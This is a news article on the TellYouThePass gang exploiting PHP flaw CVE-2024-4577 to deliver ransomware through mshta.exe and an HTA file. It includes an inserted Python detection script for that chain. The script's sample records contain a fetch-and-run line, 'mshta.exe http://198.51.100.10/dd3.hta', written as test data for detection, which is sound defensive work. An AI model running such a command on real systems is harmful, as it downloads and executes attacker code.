‘TellYouThePass’ Gang Exploits Recent PHP RCE Flaw to Distribute Ransomware

Written by Lore Apostol
Published on June 12, 2024

Imperva Threat Research reported detecting attacker activity that leverages the new PHP vulnerability CVE-2024-4577 to deliver malware, starting on June 8, which the researchers have attributed to the ‘TellYouThePass’ ransomware campaign. Other attacks exploiting this vulnerability include WebShell uploads and ransomware deployment attempts. A fix for CVE-2024-4577 is already available.

This critical RCE flaw allowed the threat actors to execute arbitrary PHP code on the target system and, via mshta.exe, a native Windows binary able to execute remote payloads, run a malicious HTML Application (HTA) file hosted on an attacker-controlled web server.

The initial infection uses an HTA file (dd3.hta) containing a malicious VBScript with a long base64-encoded string. Decoding it yields the bytes of a binary, which are loaded into memory at runtime.
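The two passages above describe a chain a defender can look for: a PHP worker process launching mshta.exe with a remote URL, and an HTA file that pairs VBScript with a long base64 blob. The following detection script is an added example, not code from the article or from Imperva's report. The process-event format (`ParentImage=...|Image=...|CommandLine=...`), the list of web-server parent process names, the base64 length threshold and all sample records are constructed assumptions for illustration.

```python
"""Flag mshta.exe launches that match the CVE-2024-4577 -> HTA delivery chain,
and flag HTA files that embed VBScript together with a long base64 payload.
Added example; log format, thresholds and sample data are assumptions."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumed set of web-stack parents that should never spawn mshta.exe.
WEB_PARENTS = {"php-cgi.exe", "php.exe", "httpd.exe", "nginx.exe", "w3wp.exe"}
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
VBSCRIPT_TAG = re.compile(r"<script[^>]*language\s*=\s*[\"']?vbscript", re.IGNORECASE)
# 512 characters is an assumed threshold: long enough to skip short strings,
# short enough to catch an embedded binary.
LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{512,}={0,2}")


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return re.split(r"[\\/]", path)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'key=value|key=value' process-creation record."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def classify(ev: ProcEvent) -> Optional[str]:
    """Severity for an mshta.exe launch, or None when nothing stands out."""
    if _basename(ev.image) != "mshta.exe":
        return None
    remote = REMOTE_URL.search(ev.command_line) is not None
    from_web = _basename(ev.parent_image) in WEB_PARENTS
    if remote and from_web:
        return "high"      # web server fetching a remote HTA: the described chain
    if remote or from_web:
        return "medium"    # one indicator only; worth a look, not an alert on its own
    return None


def scan_events(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (severity, command line) for every flagged record."""
    flagged = []
    for line in lines:
        ev = parse_event(line)
        sev = classify(ev)
        if sev is not None:
            flagged.append((sev, ev.command_line))
    return flagged


def suspicious_hta(content: str) -> bool:
    """True when an HTA carries VBScript and a long base64 run in the same file."""
    return bool(VBSCRIPT_TAG.search(content)) and bool(LONG_BASE64.search(content))


# Constructed sample records (198.51.100.10 is a documentation address).
SAMPLE_EVENTS = [
    "ParentImage=C:\\php\\php-cgi.exe|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta.exe http://198.51.100.10/dd3.hta",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta.exe C:\\Tools\\helpdesk.hta",
    "ParentImage=C:\\php\\php-cgi.exe|Image=C:\\php\\php.exe|CommandLine=php.exe -v",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta.exe https://example.com/app.hta",
]

# Constructed HTA samples: a small helper app and one with an embedded blob.
BENIGN_HTA = ('<html><head><title>Helpdesk</title></head><body>'
              '<script language="vbscript">MsgBox "hi"</script></body></html>')
SUSPICIOUS_HTA = ('<html><head><script language="VBScript">\nDim payload\npayload = "'
                  + base64.b64encode(bytes(600)).decode() + '"\n</script></head></html>')

if __name__ == "__main__":
    for sev, cmd in scan_events(SAMPLE_EVENTS):
        print(f"[{sev}] {cmd}")
    print("benign HTA flagged:", suspicious_hta(BENIGN_HTA))
    print("suspicious HTA flagged:", suspicious_hta(SUSPICIOUS_HTA))
```

The process check deliberately scores the parent/child relationship and the remote URL separately: on a PHP host the combination is the signal, while a remote HTA launched from explorer.exe on its own is common enough in some environments that it only merits a lower severity. The HTA check is a cheap triage filter for files found in web-writable directories, not a replacement for detonating the sample.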

[Figure: TellYouThePass ransomware code. Image source: Imperva]

Recently, ‘TellYouThePass’ variants have been observed as .NET samples distributed via HTML Applications, and the HTA launched through mshta.exe delivers a .NET variant of the ‘TellYouThePass’ ransomware.

The sample analyzed by the researchers in this report sends an HTTP request to the command-and-control (C2) server containing an infection notification and data about the infected machine, disguised as a request to retrieve CSS resources.

The binary then enumerates directories, kills processes, generates encryption keys, and encrypts files, and finally drops a ReadMe note containing the ransom demands in the web root directory.

A report from Censys says more than 450,000 exposed PHP servers, predominantly in the U.S. and Germany, could be vulnerable to this flaw.

‘TellYouThePass’ has been known since 2019, and the group has been targeting both enterprise and private environments on Windows and Linux systems, usually exploiting CVE-2021-44228 (Apache Log4j) and CVE-2023-46604, among others.

Ransomware attacks are still seen in high numbers. The latest incidents that made the news were the targeting of U.S. education and recreation sectors, BianLian’s attack on Australia’s Northern Minerals, and the disruption of Seattle Public Library’s activity.
